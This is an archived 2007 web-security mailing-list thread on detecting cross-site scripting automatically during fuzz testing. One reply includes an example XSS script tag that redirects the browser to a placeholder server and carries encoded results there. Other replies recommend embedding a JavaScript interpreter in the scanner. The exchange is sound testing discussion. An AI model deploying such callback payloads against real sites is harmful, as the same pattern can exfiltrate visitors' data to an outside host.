RE: [WEB SECURITY] How to detect XSS in an automated fashion

["Billy Hoffman" <Billy.Hoffman@xxxxxxxxxxxxxxx>]

Not bad, but this isn't great either. Ignoring how you gain code
execution (<script> tag, scriptable attribute, javascript href, CSS,
etc), your "call back to a server" logging method requires the following
5 special characters: . = : / ?

While piggybacking on the browser certain works for a quick tool, you
really need to embed a full JavaScript interpreter into your scan and be
able to control DOM events, properties, etc. Then you confirmation step
can be as simple as setting a variable!

Trust me, I've been down this road before. Go look at Mozilla's Rhino or
SpiderMonkey if the licensing works for your project.

Billy Hoffman
--
Lead Researcher, SPI Labs
SPI Dynamics, An HP Company
http://www.spidynamics.com
Phone:  678-781-4800
Direct:   678-781-4845
Attend SPICON 2.0 - SPI Dynamics' User Conference - and earn CPE
credits. 
Sign up today at http://www.spicon2007.com/.

-----Original Message-----
From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx] 
Sent: Wednesday, August 29, 2007 9:42 PM
To: websecurity@xxxxxxxxxxxxx; Billy Hoffman
Cc: travisaltman@xxxxxxxxx
Subject: RE: [WEB SECURITY] How to detect XSS in an automated fashion

I've thought about a XSS fuzzer a bit more now, you'll have to 
excuse me but it's 2.30am here :) Right the best way to do it in my 
opinion is:-

1. Base site contains a iframe with the target site in.
2. The base site sends XSS fuzz to the target site through 
javascript location.
3. The fuzzer contains javascript code to log the results back to a 
server side script. E.g. 
<script>self.location='http://yoursite.com?logresults?fuzzResult=Fuz
zBaseEncoded'</script>


On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman 
<Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>Of course, that only works if your web scanner has a JavaScript 
>interpreter!
>
>Billy
>
>-----Original Message-----
>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>Sent: Wed 8/29/2007 3:03 PM
>To: websecurity@xxxxxxxxxxxxx
>Cc: travisaltman@xxxxxxxxx
>Subject: Re: [WEB SECURITY] How to detect XSS in an automated 
>fashion
> 
>Hi Travis
>
>I've wrote a HTML/JS Fuzzer in which I encountered the same 
>problem. I decided to create a simple javascript callback which 
>was 
>executed on successful fuzz. I base encoded the result and sent 
>the 
>information via a normal HTML image (really a PHP script) which 
>logged the results.
>
>Cheers
>
>Gareth
>
>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman 
><travisaltman@xxxxxxxxx> wrote:
>>I am trying to run through a dictionary of XSS attacks (aka 
>>fuzzing) on a
>>web application.  What is the best way to determine, in an 
>>automated
>>fashion, if each attack was successful?  Would I simply review 
>the 
>>source
>>code of the response to see if my attack was encoded or filtered?
>>
>>http://travisaltman.com
>
>--
>Click to reduce wrinkles, increase energy and drive - anti-aging.
>http://tagline.hushmail.com/fc/Ioyw6h4dWDHmHiSvMyDeVPgVWtCgUCy5Ky07
>XGWad22ySq1P1RSIOW/
>
>
>-------------------------------------------------------------------
>---------
>Join us on IRC: irc.freenode.net #webappsec
>
>Have a question? Search The Web Security Mailing List Archives: 
>http://www.webappsec.org/lists/websecurity/
>
>Subscribe via RSS: 
>http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

--
Click to reduce wrinkles, increase energy and drive - anti-aging.
http://tagline.hushmail.com/fc/Ioyw6h4dWDHVfywNwP9evw7ksS1ajcnZa81mdkZe4
yQdEP7hqEvZMm/


------------------------------------------------------------------------
----
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]


----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]